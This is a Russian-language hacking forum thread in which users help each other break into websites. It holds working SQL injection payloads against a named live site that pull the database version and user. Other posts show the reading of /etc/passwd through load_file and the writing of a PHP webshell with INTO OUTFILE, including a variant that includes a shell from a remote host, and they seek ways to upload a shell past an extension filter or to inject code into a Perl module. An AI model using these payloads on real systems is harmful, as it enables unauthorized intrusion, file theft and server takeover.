Непонятная иньекция Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть: Code: http://tenderjet.com/catalog/371-1 Плюсики она вроде как тоже кушает: Code: http://tenderjet.com/catalog/371+-+1 но вот даже and 1=1 кушать отказывается, ругаясь незнакомыми мне ошибками. и вообще ведет себя странно: например прокатывает такое Code: http://tenderjet.com/catalog/371-1+1=1 Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется... В общем, нужен взгляд человека со стороны
2 Train Code: http://tenderjet.com/catalog/371&&(0)union(select(version())) https://forum.antichat.ru/thread125796.html
Pashkela RulleR а можно поподробнее что за && и что за (0) в запросе от RulleR ? где об этом можно почитать ? http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEMA.TABLES)) => tender@localhost
Просто все дело было в плюсиках(пробелах) которые эта иньекция не переваривала а &&(0) это тоже самое что и and 0 чтобы первый запрос ничего не вывел. INFORMATION_SCHEMA.schemata показывает базу mysql это я поторопился - показывает, но дейстивительно ничего не прочитаешь. Всеравно это к добру - налицо неправильная настройка сервера. файлы вроде тоже не читает, но ничего, прорвемся... как-нибудь
Есть php-скрипт, которому передается два параметра и jpg-файл. Скрипт конвертит jpg в png и закидывает файл в /images/ с именем Оба параметра практически не фильтруются(ни по длине, ни по содержанию). Есть способы обрезать конечное расширение ".png", дописываемое скриптом, чтобы залить пхпшный шелл? %00 - безуспешно.
Нет же, переименовывает. А то, что конвертит - это общий функционал. Я же написал: Под параметрами я имел ввиду переменные, передающиеся POST'ом.
Народ помогите советом. Есть уязвимый пёрл скрипт при помощи которого я могу писать в файлы, как мне запихать грёбаную функцию в pm файл который подгружается в других пёрл скриптах , что бы можно было выполнить команду. Сразу говорю писать в сами скрипты незя, слетают права на запуск =(
Я конечно совсем в перле не силен, но если в данной задаче целью является вэб-сервер, то кто мешает записать,например, пхп-шелл, насколько я знаю пхп-скриптам для работы не нужны права на исполнение. Хотя я могу ошибаться.
Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод. Или в саппорт хостинга написать чтобы отключили или поставили права на исполнение твоего перлового скрипта.
1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39) 2). потом проверь права на чтение/запись файлов http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3-- или так http://test/news.php?id=1+union+select+1,file_priv,2,3+from+mysql_user+where+user='root')-- насчет user-а можешь проверить запросом http://test/news/php?id=1+union+select+1,user(),2,3-- выдаст root@localhost, пишешь без всяких локалхостов. 3). если все данные пункты выполнились на ура, идем дальше. http://test/news.php?id=1+union+select+1,'код_шелла',2,3+into+outfile+'полный_путь_сервера'-- или если не хочешь заморачиваться (обз. условие allow_url_include=on) http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_сервера'--
Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия: 1) file_priv - On 2) директория на запись 3) magic_quotes = Off Как у тебя с правами (file_priv) ? pinch опередил
с чего ты взял что сервер работает под root-ом ? )) $user=select+user()+from+mysql.user select+file_priv+from+mysql.user+where+user=$user (hex/char)
